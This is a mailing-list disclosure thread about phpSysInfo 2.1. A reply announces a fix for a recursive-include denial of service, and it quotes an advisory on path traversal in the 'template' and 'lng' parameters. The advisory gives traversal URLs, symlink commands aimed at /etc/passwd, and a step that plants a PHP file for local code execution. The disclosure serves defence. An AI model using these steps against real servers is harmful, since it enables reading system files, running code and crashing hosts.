In bug report #670222 I described the same problem and how to use it to DoS the host. Calling "index.php?lng=../../index" creates a run-a-way recursive loop, creating a huge load and finally crashing the
apache process. This can easily be used to DoS a webserver.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015
On 19 january my fix for this problem has been incorporated in the cvs repository. This also fixes the problems described in Albert Puigsech Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57
phpSysInfo 2.1 is vulnerable, the cvs versions after 19 january are not.
mzzl Wolter Kamphuis
Albert Puigsech Galicia wrote:
/-----------------------------------------------------------------------------\ | 7 A 6 9 - A d v C: 007 |-----------------------------------------------------------------------------| | | [ Unauthorized reading files on phpSysInfo ] | \-----------------------------------------------------------------------------/ | 01/04/2003 |
Data. -----
+ Type: To gain visiblity.
+ Software: phpSysInfo.
+ Verions: until 2.1 (current version).
+ Exploit: Yes (but only local).
+ Autor: Albert Puigsech Galicia
+ Contact: ripe@7a69ezine.org
Information. ------------
PhpSysInfo is a litle PHP script destined to show system information. It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE information, etc. Visit project website on http://phpsysinfo.sourceforge.net for more info.
Description. ------------
PhpSysInfo uses a template system using 'template' variable, and a languaje system using 'lng' variable. These variables are used to complete a file path without check if it contains the '..' especial directory, allowing to read any file on system as webserver user.
Exploiting. -----------
The exploit of this vulnerability require write access on a local directory where webserver can read files.
On template case, phpSysInfo cheks only if template exists. To do it only check if 'templates/$template' exists.
---/ index.php /---
if (!((isset($template) && file_exists("templates/$template")) || $template == 'xml')) { // default template we should use if we don't get a argument. $template = 'classic'; }
---/ index.php /---
Exactly the same on languaje selection system.
---/ index.php /---
if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) { $lng = 'en'; // see if the browser knows the right languange. if(isset($HTTP_ACCEPT_LANGUAGE)) { $plng = split(',', $HTTP_ACCEPT_LANGUAGE); if(count($plng) > 0) { while(list($k,$v) = each($plng)) { $k = split(';', $v, 1); $k = split('-', $k[0]); if(file_exists('./includes/lang/' . $k[0] . '.php')) { $lng = $k[0]; break; } } } } }
---/ index.php /---
'template, variable will be used to use the file './templates/$template/form.tpl' and './templates/$template/box.tpl' for template stuff, so is necesary ti create the symlinks to read any file allowed to webserver.
local ~$ ln -s /etc/passwd /tmp/form.tpl local ~$ ln -s /etc/passwd /tmp/box.tpl
http://vulnerable/index.php?template=../../../../tmp
'lng' variable is used on this peace of code:
---/ index.php /---
require('./includes/lang/' . $lng . '.php'); // get our language include
---/ index.php /---
It allow us, as the same way as 'template' to read a file on the system.
local ~$ ln -s /etc/passwd /tmp/p.php
http://vulnerable/index.php?lng=../../../../tmp/p
But it also allow to execute arbitrary PHP code, creating the php file firts.
local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
http://vulnerable/index.php?lng=../../../../tmp/p
The use of '.' php function to concat strings remote exploit for this vulnerable php script, because we cant use %00 to end the string.
Patch. ------
There is not an oficial patch, but is easy to code it adding some regex on the code to filter '..' content on 'template' and 'lng' variables.
--
==================================== Albert Puigsech Galicia (7a69)
http://ripe.7a69ezine.org ====================================
